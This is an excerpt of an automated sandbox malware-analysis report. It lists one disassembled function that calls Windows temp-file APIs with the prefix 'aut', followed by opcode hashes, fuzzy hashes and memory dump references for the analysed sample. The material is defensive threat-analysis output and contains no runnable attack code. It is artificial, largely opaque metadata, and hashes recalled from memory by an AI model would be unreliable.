                                                                                                                                  • Opcode ID: 384536489c5c5cfbb43aff8505fef6af1e34cfa6fb9d1e068d7e4febd0fcda8f
                                                                                                                                  • Instruction ID: f2b3c5e97e00768e60795091254cd5f4ff438f3cb255198570b52803cd950aee
                                                                                                                                  • Opcode Fuzzy Hash: 384536489c5c5cfbb43aff8505fef6af1e34cfa6fb9d1e068d7e4febd0fcda8f
                                                                                                                                  • Instruction Fuzzy Hash: 06D02232384308B7E730A370DC0FFC37A44EB14B01F000929730DAA1C0C8E0B800C220
                                                                                                                                  Function 00EED009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00EED01E
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00EED035
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                  • String ID: aut
                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                  • Opcode ID: e1d1f23844e97186b8b47c87dbfc9a5c537cc51cd0b13ca0f86becdb3071163d
                                                                                                                                  • Instruction ID: d8cbcdfd8dfca8b5decefe9d305637d6837a73b306309c57bcc0915b25540fd9
                                                                                                                                  • Opcode Fuzzy Hash: e1d1f23844e97186b8b47c87dbfc9a5c537cc51cd0b13ca0f86becdb3071163d
                                                                                                                                  • Instruction Fuzzy Hash: 20D05EB154030EBBDB20ABA0ED0EF99776CA700745F1041907B14D10D1D2B4E64A9BA1